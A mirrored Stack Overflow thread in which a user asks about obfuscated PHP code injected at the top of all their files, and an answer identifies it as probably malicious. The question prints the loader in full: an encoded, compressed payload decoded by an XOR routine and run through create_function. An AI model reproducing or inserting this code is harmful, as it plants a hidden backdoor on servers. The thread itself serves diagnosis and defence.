stackoom
  简体   繁体   中英

Unexplained code appearing in all php files

 原文  2016-01-18 04:09:22       php/ base64/ eval

Question

I have this code on top of all my php files in the source control somehow

Can you someone please shed some light on what this is?

EDIT: I know its most likely bad, I know that it is trying to create functions. But what exactly are those functions going to do? It is too jumbled!! If some one can spend some time on this, then hats off to them.

Otherwise, I am attempting this tomorrow with a fresh mind.

Thanks fellow stackoverflowERS for all the help :) 

<?php
     $qhtgndmn;
    $qhtgndmn = array(
        '$qhtgndmn[0]=array_pop($qhtgndmn);$twpxkaml=twpxkaml(1,13);$qhtgndmn[0]=$twpxkaml($qhtgndmn[2]);',
        '$qhtgndmn[2]=gzuncompress(twpxkaml(696,2300));',
        'cH5/V3l1ZWl1eHx6Z31PZHVhUmRpcWxreVl9eWV4ZnFoWGh/cGlzel1ZRUlGXF5QUktLSkRWQF5QRGVwcH11Ym14fXhpbHltdEF3Q3lEUURCWFlJd1NLWG12dnBac2R6SlVEXk9CTldCX1Zwe3FkaWFldSh6fm03MTk8L1ptTC0+JSY8WURuQnhuPyhhVUFVMGx1REtMayJScWhIUExDRTVHIkVBQm55cWRieGNHfn95b2Z1On5sZW1pKmtkc31lPWpjfnZlYnkpa3JnZ3VtO29pZHR0f2h3VmVYakN6dnYjPzlVUUduUURCWFVYXlRZSmV7cWVtPCROY2hubWJkInB0cH94I3l1fWJueWxuY0NDcDJrYXh5S1VHXU9DRVhYX0tnalpTQldKU0RBWkROSUxAR253UUhFU1pTT0JTX0RMQVBwViZRd1FEQlhVRUJCX1JDQURHUVVLRzZ0c34lY3lqUG1ZNmdmJWl/f3NoY3YpYmhmcnxvTXNsYHpna3ROc2B9XWJoe3FhYU1dRmRNVVtYUmphaE1dRkxDQkRZeDZke3glPndoY3kvc29gfVZNNmR7eCU+WERIIHdoaHFTNmR7eFZHdTZnZiVpf39zaGN2KXR5aXV4dGVUZnpEWEt/f2Rrb3ROY2R/Z1U3TFg3fHlvQ2thbm1lVk94ZkZ2THwhOGlkcX1+eWRhZy9md31sTWltaThgY350c3cjbGN1Q3F6Z3siOG5lf3NmfyNsY3U2Z2YlaX9/YWRqLHZpeTpvJEJsYz97K2JpU0I/ZCt4YmA3dzBOZD9mK0JDaFR6ZWRkVXBrUG0oYVdxZGJ4MD8+SFR2ZUo/ZytubXNycnB+f3xXUkh0V2RqdWJnemRRP2cra39ZeWdNfGhza0M/Zyt7YTBZU1ldLTcvOWlmUX9lfDAwaWw2cVZDYYyTEGN/ykH7oo4DNClEXPk9vz6xJkNyFmFoAY9aZftjFYgaJ07zJkdH8dn67yUjjfR69CvErfxz' . 'PlOOhSI6Erok5o1bA6nMJSDxxqq7Zz6Tz0YM+qBfuifH0GOxhs+wDbow12WMNREZRJOhI0++l8t4Tw5fHyIiTltPV1fM7hFJ3YY8UyVVXgz9dUIU4cSgOEmkMqnEBofXWVQzC2SQWdK2X/7j9mEPkL0WwFQXY2sKlpefbbtyupzcOtn64iETbtX9Qk7Pwd967v8wtNauzZFXoZ3kp/wTiH4SRs0xhWW3e1FBFHdv1//KCGIEG8OhKz/l3Nxc+l2fFeUdd3PIiobJ74PHLiHY93h9Dl7SFoFOFD1Os3+NcrhX22NUzURgdwvm8YtAHxwpXnsWs4jMGYdYLF0SWTks8X7DKwPzDCsET1IZ9XAr8+uQMuo9xfz+i64uMaIbefcL8+uahwpD+y69nfBST5p6vTY9+9Xi/RlejL9xwyp1mKyQ2cEiBCimYZzHIf0+5iE7Ytc1+ihMNfFv3lMdvffIz6Rq76MNy4gOQpJNWsVU3UcunOlr4r1hlCd35t+7KxDLiLFJD4SJxJSjOkEWl0UU8Am/rSkAd' . 'dMpbneYjz2YP+nXJu1ckKjtYP4VX8Vd7OQLb8cObiiTTw93W1gCp/LimsjhmYrOYpzvYtQicT2nsr5091XeGnWm+m2oxbsqUi5QGjMSSJbMvME7PFQPWU8aCUsopHbmPyxOJs7dPzBCNQBUhUr+8mrOcsbX3aMkjMynJ0ASbG0d4EnF6943KEQWqZMFe8tU/m+HcJuDssyWHmVxGWA4x2QQi1fYAD2act1p09RQf4irmqJinYdfG4y/AX0WaEImy9C5FeB8Mj5UGv18pAZ9O3O50cvTfmWRs0yroVieP6ZPPW0pDpCtOvE+jfTzyFhwOHazWYAu4ag+iHpWrU+OFZhUJX520KzaJnLAzA5N0wmDvdgoYtpnQ2eam7hil1t0F3KohSXhk91FTghMnhQdWbY+bC6V6EfO2QzAmTbDk+4nqyTmweMaYaDQ+bSmzZtMHmX5aH1MP0x/hQ6Jcf/uzJaShQKLP+N/PIId4atvXc9dyAW7OjubhFTkCuYwwLiI3CSGoWrJGXFIA3ThehZygyutB4TJqii14hrRJF5DJBfO/TB8lh9+k/W3RafZO5e' . 'O3602dC3+gik0rzVJwF0tvByeQdNlc8pi0zx6q0uAD2dFiVJls2FZebcUA9mABrO30vdbMfyabEldMkX+po+PkL63xJiahC4thVL1e4nWFcFxV9x7Ghfko/lu90HQKx20M6lw6H7zB2e+lso7K/NHiHefufUP7ACFPggcfLY/PKjdR4mrf0uMlGfF3NkU1wxbEDp7S8TBADcyvW1sTZenmKjRuynMZWsgzpaL1GbdxbxqCcZ8j0c07+9+9P1nxHvJgc8ivprlNJVvafZckzzR55LRxi5oUiaHczCE/tj3cDq+OfybEHUd+nqBkEibSrnxnsgNQnICSqIiqfWQU9Pnm2PW6cqe6R3SvK+fO9WnuVYr2L62smMwZDENU9H9zyS1odWMnmQI2LYiT46UblsDR8QGxakmpDGM8kSeob1ac0razk2DerXttvrtkQW7DlUcbSAfgNhxjMD2c8VjTndaD2CTLuTE0Q/bza7bj4pexmWS4cdEBm0jInUKQzvYuuu9WV14NebJmYGGomjoploNyVNTLEVcRGA6n51v2kKmfvT9ouHg4vjyT+H86rbFPfntj3yJBa4w+FNFEwimiXDzu0aGl+QFR0nwARSe1duCyC33NUkzMf0rbdtiXkmX5cfIhTW0pbrR7jutZABUcK8JONEOKUSKuMCwzxv/6JoX5z11J0a+btMArNMbz+UAMxhmxv/5FPW+RPM52gHCrXkpn/uXTuvUYWCr3Ks+fg9VggsdQuJGVWm2oM3lVeHAG5dCyqJtjl+OY8FwuP7PJNgCH+w2jS3dxXxGbX919c3BxDpGZ9imENYwU7K4h7LQ1zTytBETjPI3haqXM3cC3XJ4iOpmhB/mqTMBtAhNfNSuJyRqyA97ITUsCy3ZMzJ+f+schIIrwN/9mIowJNokAc1Z84Rdd5UCkeYeZeubY7Ar7d86uVCF8qvhptLc4KvF53MMazOLcfYczkf5F2oQSqaVOx/H' . '5Rv6TWovgn7QIn0Shle5p6H+uaNOEi9oHmR6ClizijBY+TyDkVSuL/CQM99uXwytsY5QV788xxL08zWRjeCRQCrmYH2f8t2+oPw2pc9qtpIqhgUvuWsUw6APob+QwEsyUuiHhnJPYSs3vvgUZbAJvIRESJ/uvRqQVOcH2jg+VlWE9JfJcaeKevHOB/eBLM/GJ3rGFU/3H6qkac4SfQ+HxEu8C+22F/gWC8tsuzul/NdMlSeuxdhlmj1JrFjms6HUv2g5bqPd5AFVhFde6u5nTXLMnAypnv/UoSv5y57w5IPqH6jlcEWLEOZzITGg2sdCLdWgyZTe7L6pnRcKDOdl6SCNsCq35lEzPNgQQFccoeY6hbhB7NyFoHWkZqzgJu+6UN/HXAaI0SGB9ENyTha63Hfxe5rKdmfzoz0PS5uSleltbId57Q+eZgNQh9SRfiHt7ID7+nliqZJNuM1jfbq9f0ES2U704OT23s7loST10r2TudVGhk/wIdBHxSrqMMo6hLw/teHuifLihrlZFobhS/fXnoeBt76I+kKNcfZWexkb5ekadmipuIr44u/iFo6dtl+2J8SUIdzKml5nSR99mBWfo7OlwhK/nS8NnmKoG37mgoPyGlRSjyIXV1/EbRKH+L2Jtk6A/1Jr04RwMeM+o9yFzc+dfYJhONPKcIa9TX/Ndn/zlCFp/7Xy+O8S5zljlOOydS4J0CIBcGFX+DfnfTdMpFwXP5VrFXwyc0fThx+5f1qz5RSWuxQry/CBEgnB1utKv2qc+g2T7hoC2uaSlRbnAXzwShfC9rYXUsvGpQH8V+6/OIok6YJabTr9feok9s43ifz15urUgIQxlBmPiwoYvSUDWe453LIFe+7nd/L0e5rCWr/uBqIDgnVZZVFre3FlbTwkTmNobm1iZGxY',
        "f\x7bqem\x3c\x24Nchnmbd"
    );
    $hvnlvgr  = 'create_';
    if (function_exists($hvnlvgr .= 'function') && !function_exists('twpxkaml')) {
        function twpxkaml($d, $j)
        {
            global $qhtgndmn;
            $v = str_pad($g = 'yPvhJ0qgMmbfaIEZ', $j, $g);
            $e = str_repeat("\x1f", $j);
            $f = str_repeat("\xe0", $j);
            $n = substr($qhtgndmn[0], $d, $j);
            return (($n ^ $v) & $e) | ($n & $f);
        }
        ;
        for ($xv = -1; ++$xv < 3; $hvnlvgr('', '}' . $qhtgndmn[$xv] . '{'));
    }
    ;
    unset($qhtgndmn);

    var_
     ?>

1 answers

solution1
 4  2016-01-18 04:20:13

Looks like it's creating three anonymous functions with create_function, to execute obfuscated code it's hiding in the $qhtgndmn array and either decoding or obfuscating further with twpxkaml.

So assume it's malicious. Or by someone really, really bored. Check the commit log.

暂无
暂无

The technical post webpages of this site follow the CC BY-SA 4.0 protocol. If you need to reprint, please indicate the site URL or the original address.Any question please contact:yoyou2525@163.com.

Related Question garbage code appearing at the beginning of PHP files Strange code added in all php files Updated Magento php files not appearing to show changes PHP MySQL Unexplained Null Values-How To Insert all Values In one Record? Unexplained 404 errors on PHP app Unexplained PHP/MySQL error. Code works on my test server, but not the permanent server PHP Pagination - All pages appearing on one page PHP obfuscated “Dodgy” code is appearing on my website PHP code appearing in header section of page Code to create a nested array of all files in a directory & subdirectories with PHP is not working
Related Tags
 
粤ICP备18138465号  © 2020-2024 STACKOOM.COM